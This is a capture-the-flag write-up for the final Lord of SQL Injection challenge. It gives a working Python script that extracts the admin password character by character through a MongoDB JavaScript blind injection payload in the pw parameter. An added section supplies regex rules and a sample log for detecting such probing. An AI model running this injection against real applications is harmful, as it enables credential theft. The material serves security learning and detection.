This is the last challenge of Lord Of SQL Injection.
It looks like a simple Blind SQL Injection challenge in a MongoDB environment. I should be able to write the exploit code right away.
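```python
import requests

# TLS verification is turned off below (verify=False), so silence the warnings it triggers.
requests.packages.urllib3.disable_warnings()

org_url = "https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php"
header = {'Cookie': 'PHPSESSID='}
session = requests.session()

# Brute Force
password = ''
for i in range(0, 20):          # index into the password string
    for j in range(48, 123):    # candidate characters '0' through 'z'
        # %26%26 is URL-encoded "&&". The injected condition is true only when
        # character i of the admin password equals chr(j).
        payload = "?pw='||obj.id=='admin'%26%26obj.pw[" + str(i) + "]==" + "'" + chr(j)
        res = session.get(url=org_url + payload, headers=header, verify=False)
        # Skip '?' (63).
        if ("Hello admin" in res.text) and (j != 63):
            password += chr(j)
            print("Current PW is [ %s ]\n" % password)
            break

# Result
print("\n\nPW --> %s\n" % password)
```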
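Seen from the server side, the loop above leaves a recognisable trail in request logs: one client repeatedly sending a `pw` value that carries JavaScript operators, a document field reference and an indexed character comparison. The following is an added detection example, not part of the original post; the rule names, function names, request path and log lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Patterns for JavaScript operators and field access inside a request parameter,
# modelled on the pw payload above ('||obj.id=='admin'&&obj.pw[i]=='c).
RULES = {
    "quote_then_logic": re.compile(r"'\s*(\|\||&&)"),
    "doc_field_access": re.compile(r"\b(obj|this)\.\w+"),
    "indexed_char_compare": re.compile(r"\w+\[(\d+)\]\s*==\s*'"),
}

def rule_hits(value):
    """Names of the rules that match one URL-decoded parameter value."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))

def probed_positions(log, min_requests=3):
    """Map client -> sorted string indexes probed, for clients that sent at
    least min_requests parameter values matching all three rules."""
    positions, counts = defaultdict(set), defaultdict(int)
    for client, target in log:
        query = urlsplit(target).query
        for _, value in parse_qsl(query, keep_blank_values=True):
            if len(rule_hits(value)) == len(RULES):
                counts[client] += 1
                idx = RULES["indexed_char_compare"].search(value).group(1)
                positions[client].add(int(idx))
    return {c: sorted(p) for c, p in positions.items() if counts[c] >= min_requests}

# Constructed sample log (client address, request target); not from the original post.
SAMPLE_LOG = [
    ("203.0.113.7", "/chall/example.php?pw='||obj.id=='admin'%26%26obj.pw[0]=='0"),
    ("203.0.113.7", "/chall/example.php?pw='||obj.id=='admin'%26%26obj.pw[0]=='1"),
    ("203.0.113.7", "/chall/example.php?pw='||obj.id=='admin'%26%26obj.pw[1]=='0"),
    ("198.51.100.4", "/chall/example.php?pw=hunter2"),
    ("198.51.100.4", "/chall/example.php?id=guest&pw=a||b"),
]

if __name__ == "__main__":
    print(probed_positions(SAMPLE_LOG))
```

The set of probed indexes per client shows how far a character-by-character extraction progressed before it was noticed.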